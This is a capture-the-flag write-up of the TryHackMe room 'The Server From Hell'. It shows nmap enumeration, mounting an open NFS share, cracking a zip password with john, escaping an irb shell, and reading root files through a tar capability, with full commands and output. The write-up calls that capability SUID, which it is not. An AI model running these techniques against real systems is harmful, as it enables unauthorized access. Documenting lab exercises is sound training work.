TryHackMe - The Server From hell

Face a server that feels as if it was configured and deployed by Satan himself. Can you escalate to root?

Start at port 1337 and enumerate your way. Good luck.

Title The Server From Hell
Difficulty Medium
Author DeadPackets
Tags security, Firewall, nfs, shell escape

Enumeration

Nmap

Through the instruction of the room, it said “Start at port 1337” → I will use the nmap to scan only the 1337 port

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -A -Pn -p 1337 svfromhell.thm
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 11:05 EDT
Nmap scan report for svfromhell.thm (10.10.245.1)
Host is up (0.34s latency).

PORT     STATE SERVICE VERSION
1337/tcp open  waste?
| fingerprint-strings:
|   GenericLines, LDAPSearchReq, NULL, X11Probe:
|     Welcome traveller, to the beginning of your journey
|     begin, find the trollface
|     Legend says he's hiding in the first 100 ports
|_    printing the banners from the ports
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.94%I=7%D=10/9%Time=652416B3%P=x86_64-pc-linux-gnu%r(NU
SF:LL,A7,"Welcome\x20traveller,\x20to\x20the\x20beginning\x20of\x20your\x2
SF:0journey\nTo\x20begin,\x20find\x20the\x20trollface\nLegend\x20says\x20h
SF:e's\x20hiding\x20in\x20the\x20first\x20100\x20ports\nTry\x20printing\x2
SF:0the\x20banners\x20from\x20the\x20ports")%r(GenericLines,A7,"Welcome\x2
SF:0traveller,\x20to\x20the\x20beginning\x20of\x20your\x20journey\nTo\x20b
SF:egin,\x20find\x20the\x20trollface\nLegend\x20says\x20he's\x20hiding\x20
SF:in\x20the\x20first\x20100\x20ports\nTry\x20printing\x20the\x20banners\x
SF:20from\x20the\x20ports")%r(X11Probe,A7,"Welcome\x20traveller,\x20to\x20
SF:the\x20beginning\x20of\x20your\x20journey\nTo\x20begin,\x20find\x20the\
SF:x20trollface\nLegend\x20says\x20he's\x20hiding\x20in\x20the\x20first\x2
SF:0100\x20ports\nTry\x20printing\x20the\x20banners\x20from\x20the\x20port
SF:s")%r(LDAPSearchReq,A7,"Welcome\x20traveller,\x20to\x20the\x20beginning
SF:\x20of\x20your\x20journey\nTo\x20begin,\x20find\x20the\x20trollface\nLe
SF:gend\x20says\x20he's\x20hiding\x20in\x20the\x20first\x20100\x20ports\nT
SF:ry\x20printing\x20the\x20banners\x20from\x20the\x20ports");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: phone|VoIP phone|general purpose|WAP|proxy server|webcam
Running (JUST GUESSING): Google Android 4.4.X|4.0.X (92%), Cisco embedded (91%), Linux 3.X (91%), Linksys embedded (91%), WebSense embedded (90%), AXIS embedded (89%)
OS CPE: cpe:/o:google:android:4.4.0 cpe:/h:cisco:cp-dx80 cpe:/o:google:android cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel cpe:/h:linksys:ea3500 cpe:/o:google:android:4.0.4
Aggressive OS guesses: Android 4.4.0 (92%), Cisco CP-DX80 collaboration endpoint (Android) (91%), Linux 3.6 - 3.10 (91%), Linksys EA3500 WAP (91%), Websense Content Gateway (90%), Axis M3006-V network camera (89%), Android 4.0.4 (Linux 2.6) (89%), Linux 2.6.18 - 2.6.24 (89%), Linux 3.16 (89%), Linux 4.4 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 1337/tcp)
HOP RTT       ADDRESS
1   339.14 ms 10.9.0.1
2   339.13 ms svfromhell.thm (10.10.245.1)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.73 seconds

At the fingerprint-strings section:

| fingerprint-strings:
|   GenericLines, LDAPSearchReq, NULL, X11Probe:
|     Welcome traveller, to the beginning of your journey
|     begin, find the trollface
|     Legend says he's hiding in the first 100 ports
|_    printing the banners from the ports

The message from port 1337 tells me that there is something hidden in the first 100 ports and it recommends me to print out the banners only. Let’s do another scan:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC --script=banner -Pn -p 0-100 svfromhell.thm
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 11:10 EDT

If you look at the first 50 port-banners, it actually displays a trollface:

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ cat nmap_100 | grep "banner"
# Nmap 7.94 scan initiated Mon Oct  9 11:12:39 2023 as: nmap -sC --script=banner -Pn -p 0-100 -o TryHackMe/svfromhell/nmap_100 svfromhell.thm
| banner: 550 [REDACTED] 00000000000000000000000000000000000000000000000000000
| banner: 550 [REDACTED] 00000000000000000000000000000000000000000000000000000
| banner: 550 [REDACTED] 00000000000000000000000000000000000000000000000000000
| banner: 550 [REDACTED] 00000000000000000000000000000000000000000000000000000
| banner: 550 [REDACTED] 00000000000000000000000000000000000000000000000000000
| banner: 550 [REDACTED] 0ffffffffffffffffffffffffffffffffffffffffffffffffffff
| banner: 550 [REDACTED] 0fffffffffffff777778887777777777cffffffffffffffffffff
| banner: 550 [REDACTED] 0fffffffffff8000000000000000008888887cfcfffffffffffff
| banner: 550 [REDACTED] 0ffffffffff80000088808000000888800000008887ffffffffff
| banner: 550 [REDACTED] 0fffffffff70000088800888800088888800008800007ffffffff
| banner: 550 [REDACTED] 0fffffffff000088808880000000000000088800000008fffffff
| banner: 550 [REDACTED] 0ffffffff80008808880000000880000008880088800008ffffff
| banner: 550 [REDACTED] 0ffffffff000000888000000000800000080000008800007fffff
| banner: 550 [REDACTED] 0fffffff8000000000008888000000000080000000000007fffff
| banner: 550 [REDACTED] 0ffffff70000000008cffffffc0000000080000000000008fffff
| banner: 550 [REDACTED] 0ffffff8000000008ffffff007f8000000007cf7c80000007ffff
| banner: 550 [REDACTED] 0fffff7880000780f7cffff7800f8000008fffffff80808807fff
| banner: 550 [REDACTED] 0fff78000878000077800887fc8f80007fffc7778800000880cff
| banner: 550 [REDACTED] 0ff70008fc77f7000000f80008f8000007f0000000000000888ff
| banner: 550 [REDACTED] 0ff0008f00008ffc787f70000000000008f000000087fff8088cf
| banner: 550 [REDACTED] 0f7000f800770008777 go to port [REDACTED] 80008f7f700880cf
| banner: 550 [REDACTED] 0f8008c008fff8000000000000780000007f800087708000800ff
| banner: 550 [REDACTED] 0f8008707ff07ff8000008088ff800000000f7000000f800808ff
| banner: 550 [REDACTED] 0f7000f888f8007ff7800000770877800000cf780000ff00807ff
| banner: 550 [REDACTED] 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff
| banner: 550 [REDACTED] 0ff70800008ff800f007fff70880000087f70000007fcf7007fff
| banner: 550 [REDACTED] 0fff70000007fffcf700008ffc778000078000087ff87f700ffff
| banner: 550 [REDACTED] 0ffffc000000f80fff700007787cfffc7787fffff0788f708ffff
| banner: 550 [REDACTED] 0fffff7000008f00fffff78f800008f887ff880770778f708ffff
| banner: 550 [REDACTED] 0ffffff8000007f0780cffff700000c000870008f07fff707ffff
| banner: 550 [REDACTED] 0ffffcf7000000cfc00008fffff777f7777f777fffffff707ffff
| banner: 550 [REDACTED] 0cccccff0000000ff000008c8cffffffffffffffffffff807ffff
| banner: 550 [REDACTED] 0fffffff70000000ff8000c700087fffffffffffffffcf808ffff
| banner: 550 [REDACTED] 0ffffffff800000007f708f000000c0888ff78f78f777c008ffff
| banner: 550 [REDACTED] 0fffffffff800000008fff7000008f0000f808f0870cf7008ffff
| banner: 550 [REDACTED] 0ffffffffff7088808008fff80008f0008c00770f78ff0008ffff
| banner: 550 [REDACTED] 0fffffffffffc8088888008cffffff7887f87ffffff800000ffff
| banner: 550 [REDACTED] 0fffffffffffff7088888800008777ccf77fc777800000000ffff
| banner: 550 [REDACTED] 0fffffffffffffff800888880000000000000000000800800cfff
| banner: 550 [REDACTED] 0fffffffffffffffff70008878800000000000008878008007fff
| banner: 550 [REDACTED] 0fffffffffffffffffff700008888800000000088000080007fff
| banner: 550 [REDACTED] 0fffffffffffffffffffffc800000000000000000088800007fff
| banner: 550 [REDACTED] 0fffffffffffffffffffffff7800000000000008888000008ffff
| banner: 550 [REDACTED] 0fffffffffffffffffffffffff7878000000000000000000cffff
| banner: 550 [REDACTED] 0ffffffffffffffffffffffffffffffc880000000000008ffffff
| banner: 550 [REDACTED] 0ffffffffffffffffffffffffffffffffff7788888887ffffffff
| banner: 550 [REDACTED] 0ffffffffffffffffffffffffffffffffffffffffffffffffffff
| banner: 550 [REDACTED] 00000000000000000000000000000000000000000000000000000
| banner: 550 [REDACTED] 00000000000000000000000000000000000000000000000000000
| banner: 550 [REDACTED] 00000000000000000000000000000000000000000000000000000
[...]

And in the middle of the face, a message (banner) mentions another port to look for, which can see from the nmap scan:

21/tcp  open   ftp
| banner: 550 [REDACTED] 0f7000f800770008777 go to port [REDACTED] 80008f7f700880cf
|_00

Keep continue enumerating that specified port:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -A -Pn -p [REDACTED] svfromhell.thm
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 11:18 EDT
Nmap scan report for svfromhell.thm (10.10.245.1)
Host is up (0.34s latency).

PORT      STATE SERVICE VERSION
[REDACTED]/tcp open  netbus?
| fingerprint-strings:
|   NULL:
|     NFS shares are cool, especially when they are misconfigured
|_    It's on the standard port, no need for another scan
[...]

NFS

Ok, now it is talking about the NFS shares. The NFS shares is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory (from HackTricks). Then I use showmount to enumerate which directory that I could mount on:

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ showmount -e svfromhell.thm
Export list for svfromhell.thm:
/home/nfs *

I create a new directory used for the nfs > mount it > list the file(s) inside:

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ mkdir mnt

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ sudo mount -t nfs svfromhell.thm:/home/nfs mnt/
[sudo] password for kali:

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ ls -l
total 4
drwxr-xr-x 2 nobody nogroup 4096 Sep 15  2020 mnt

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ ls -l mnt
total 8
-rw-r--r-- 1 root root 4534 Sep 15  2020 backup.zip

The backup.zip is the only thing available inside the mnt/ directory and it will obviously contain something helpful. However, the unzip process requires a password:

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ unzip mnt/backup.zip
Archive:  mnt/backup.zip
   creating: home/hades/.ssh/
[mnt/backup.zip] home/hades/.ssh/id_rsa password:
   skipping: home/hades/.ssh/id_rsa  incorrect password
   skipping: home/hades/.ssh/hint.txt  incorrect password
   skipping: home/hades/.ssh/authorized_keys  incorrect password
   skipping: home/hades/.ssh/flag.txt  incorrect password
   skipping: home/hades/.ssh/id_rsa.pub  incorrect password

Don’t worry, zip2john can retrieve the hash password of the zip file and john can then crack it into plaintext:

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ zip2john mnt/backup.zip
ver 1.0 mnt/backup.zip/home/hades/.ssh/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 backup.zip/home/hades/.ssh/id_rsa PKZIP Encr: TS_chk, cmplen=2107, decmplen=3369, crc=6F72D66B ts=B16D cs=b16d type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** backup.zip/home/hades/.ssh/hint.txt PKZIP Encr: TS_chk, cmplen=22, decmplen=10, crc=F51A7381 ts=B16D cs=b16d type=0
ver 2.0 efh 5455 efh 7875 backup.zip/home/hades/.ssh/authorized_keys PKZIP Encr: TS_chk, cmplen=602, decmplen=736, crc=1C4C509B ts=B16D cs=b16d type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** backup.zip/home/hades/.ssh/flag.txt PKZIP Encr: TS_chk, cmplen=45, decmplen=33, crc=2F9682FA ts=B16D cs=b16d type=0
ver 2.0 efh 5455 efh 7875 backup.zip/home/hades/.ssh/id_rsa.pub PKZIP Encr: TS_chk, cmplen=602, decmplen=736, crc=1C4C509B ts=B16D cs=b16d type=8
backup.zip:$pkzip$5*1*1*0*0*24*b16d*80696ae8c675f1ef5df2906662a9a7ce07485c18db37feb8b97ed560e572ce5cf805afb4*1*0*8*24*b16d*7d8849d53ca2d690df91b5f8ff302e0eae9c13c7fbb169b6d935abdfef8c00e339f84c09*1*0*8*24*b16d*f08eeb86fce5cd5368b57ab3b4848df3b526da3fc467bc17c191210c596608311a8a5cf1*1*0*8*24*b16d*7168a30d9a64dc6df0956c675b62ff980dbd4f16fe022b1abb1c75e1943c97e47bbdc5f5*2*0*16*a*f51a7381*8e5*52*0*16*b16d*5050fa8c08f92051a2cad9941e8a8f4522a8c5dbfa32*$/pkzip$::backup.zip:home/hades/.ssh/hint.txt, home/hades/.ssh/flag.txt, home/hades/.ssh/authorized_keys, home/hades/.ssh/id_rsa.pub, home/hades/.ssh/id_rsa:mnt/backup.zip
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ nano zip_hash

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ cat zip_hash
backup.zip:$pkzip$5*1*1*0*0*24*b16d*80696ae8c675f1ef5df2906662a9a7ce07485c18db37feb8b97ed560e572ce5cf805afb4*1*0*8*24*b16d*7d8849d53ca2d690df91b5f8ff302e0eae9c13c7fbb169b6d935abdfef8c00e339f84c09*1*0*8*24*b16d*f08eeb86fce5cd5368b57ab3b4848df3b526da3fc467bc17c191210c596608311a8a5cf1*1*0*8*24*b16d*7168a30d9a64dc6df0956c675b62ff980dbd4f16fe022b1abb1c75e1943c97e47bbdc5f5*2*0*16*a*f51a7381*8e5*52*0*16*b16d*5050fa8c08f92051a2cad9941e8a8f4522a8c5dbfa32*$/pkzip$

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ john --wordlist=~/Wordlists/rockyou.txt zip_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED]          (backup.zip)
1g 0:00:00:00 DONE (2023-10-09 11:35) 100.0g/s 819200p/s 819200c/s 819200C/s [REDACTED]6..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Since I’ve known the password of the zip file, I simply unzip it and retrive the .ssh directory of user hades: and easily get the first flag:

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ unzip mnt/backup.zip
Archive:  mnt/backup.zip
[mnt/backup.zip] home/hades/.ssh/id_rsa password:
  inflating: home/hades/.ssh/id_rsa
 extracting: home/hades/.ssh/hint.txt
  inflating: home/hades/.ssh/authorized_keys
 extracting: home/hades/.ssh/flag.txt
  inflating: home/hades/.ssh/id_rsa.pub

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ ls -l home/hades/.ssh
total 20
-rw-r--r-- 1 kali kali  736 Sep 15  2020 authorized_keys
-rw-r--r-- 1 kali kali   33 Sep 15  2020 flag.txt
-rw-r--r-- 1 kali kali   10 Sep 15  2020 hint.txt
-rw------- 1 kali kali 3369 Sep 15  2020 id_rsa
-rw-r--r-- 1 kali kali  736 Sep 15  2020 id_rsa.pub

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ cat home/hades/.ssh/flag.txt
thm{[REDACTED]}

Gain Access

There is a id_rsa key used for ssh authentication of user hades. Therefore, I immediately establish a ssh connection to the target server. However, I forget that this server is really tricky and the real ssh port is not the same as the default ssh port 22:

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ ssh hades@svfromhell.thm -i home/hades/.ssh/id_rsa
kex_exchange_identification: read: Connection reset by peer
Connection reset by 10.10.245.1 port 22

Fortunately, the hint.txt file might contain the information I need that indicate the ssh port:

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ cat home/hades/.ssh/hint.txt
2500-4500

The 2500-4500 must display a range of port used for ssh connection. So I take another nmap scan on the port. The result contains an enormous things to look through, then I save it into a file and use grep to find out the information that I want to:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC --script=banner -Pn -p 2500-4500 svfromhell.thm -o TryHackMe/svfromhell/nmap_ssh
[...]

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ cat nmap_ssh | grep "OpenSSH" --before-context 3
2707/tcp open  emcsymapiport
|_banner: \xFF\xFE\x01Foxconn VoIP TRIO 3C
2708/tcp open  banyan-net
|_banner: SSH-763-OpenSSH_cIMddP FreeBSD localisations 5r?
--
3332/tcp open  mcs-mailsvr
|_banner: 0\xCA00000\x040000
[REDACTED]/tcp open  dec-notes
|_banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
--
3472/tcp open  jaugsremotec-1
|_banner: 0fpmxywp\x14Crp\x11^a\x11G
3474/tcp open  ttntspauto
|_banner: SSH-17070095-OpenSSH_u-r-hpnxr?
--
| banner: 220 S+ ESMTP Service (Worldmail 8\xEC\xDE\xF9\xAF\xF1\xF9) read
|_y
3798/tcp open  minilock
|_banner: SSH-2.0-OpenSSH\x0D?
--
3848/tcp open  item
|_banner: HTTP/1.1 200 OK\x0D\x0AjServer: Kayak\x0D\x0ADate: 421515
3849/tcp open  spw-dnspreload
|_banner: SSH-68878660-OpenSSH_WRLitS-FC-lZFbqDpm.fc5r

The actual port used for the SSH must be displayed with the version of that ssh service which is:

[REDACTED]/tcp open  dec-notes
|_banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3

Now I know the exact port that running ssh service → It’s time to connect to the target server via that port:

┌──(kali㉿kali)-[~/TryHackMe/svfromhell]
└─$ ssh hades@svfromhell.thm -i home/hades/.ssh/id_rsa -p [REDACTED]

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

 ██░ ██ ▓█████  ██▓     ██▓
▓██░ ██▒▓█   ▀ ▓██▒    ▓██▒
▒██▀▀██░▒███   ▒██░    ▒██░
░▓█ ░██ ▒▓█  ▄ ▒██░    ▒██░
░▓█▒░██▓░▒████▒░██████▒░██████▒
 ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓  ░░ ▒░▓  ░
 ▒ ░▒░ ░ ░ ░  ░░ ░ ▒  ░░ ░ ▒  ░
 ░  ░░ ░   ░     ░ ░     ░ ░
 ░  ░  ░   ░  ░    ░  ░    ░  ░

 Welcome to hell. We hope you enjoy your stay!


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

 ██░ ██ ▓█████  ██▓     ██▓
▓██░ ██▒▓█   ▀ ▓██▒    ▓██▒
▒██▀▀██░▒███   ▒██░    ▒██░
░▓█ ░██ ▒▓█  ▄ ▒██░    ▒██░
░▓█▒░██▓░▒████▒░██████▒░██████▒
 ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓  ░░ ▒░▓  ░
 ▒ ░▒░ ░ ░ ░  ░░ ░ ▒  ░░ ░ ▒  ░
 ░  ░░ ░   ░     ░ ░     ░ ░
 ░  ░  ░   ░  ░    ░  ░    ░  ░

 Welcome to hell. We hope you enjoy your stay!
 irb(main):001:0>

The display shell does not look like a normal shell that is usually used, I have tried a few commands but most of them did not work:

irb(main):002:0> whoami
Traceback (most recent call last):
        2: from /usr/bin/irb:11:in `<main>'
        1: from (irb):2
NameError (undefined local variable or method `whoami' for main:Object)
irb(main):003:0> help

Enter the method name you want to look up.
You can use tab to autocomplete.
Enter a blank line to exit.

>> id
Nothing known about .id
>> exit
Nothing known about .exit
>>
=> nil
irb(main):004:0> ?
irb(main):005:0>

Then I notice the letter irb (Interactive Ruby Shell) standing at the beginning of the line, google it for awhile I explore the way to establish the real shell:

irb(main):006:0> exec '/bin/bash'
hades@hell:~$ whoami;id;pwd
hades
uid=1002(hades) gid=1002(hades) groups=1002(hades)
/home/hades

Then I get the user flag in the current directory:

hades@hell:~$ ls -la
total 28
drwxr-xr-x 3 root  root  4096 Sep 15  2020 .
drwxr-xr-x 6 root  root  4096 Sep 15  2020 ..
-rw-r--r-- 1 hades hades  220 Sep 15  2020 .bash_logout
-rw-r--r-- 1 hades hades 3771 Sep 15  2020 .bashrc
-rw-r--r-- 1 hades hades  807 Sep 15  2020 .profile
drwx------ 2 hades hades 4096 Sep 15  2020 .ssh
-rw-r--r-- 1 hades hades   30 Sep 15  2020 user.txt
hades@hell:~$ cat user.txt
thm{[REDACTED]}

Root Flag

I use getcap and explore a binary that set with SUID privilege:

hades@hell:~$ getcap / -r 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
/bin/tar = cap_dac_read_search+ep
hades@hell:~$ ls -l /bin/tar
-rwxr-xr-x 1 root root 423312 Jan 21  2019 /bin/tar

Via GTFOBins, the tar service which has SUID bit set could help me to read the file that belongs to the owner which is root. Therefore, I use it to read the root flag inside the /root directory:

hades@hell:~$ /bin/tar xf "/root/root.txt" -I '/bin/sh -c "cat 1>&2"'
thm{[REDACTED]}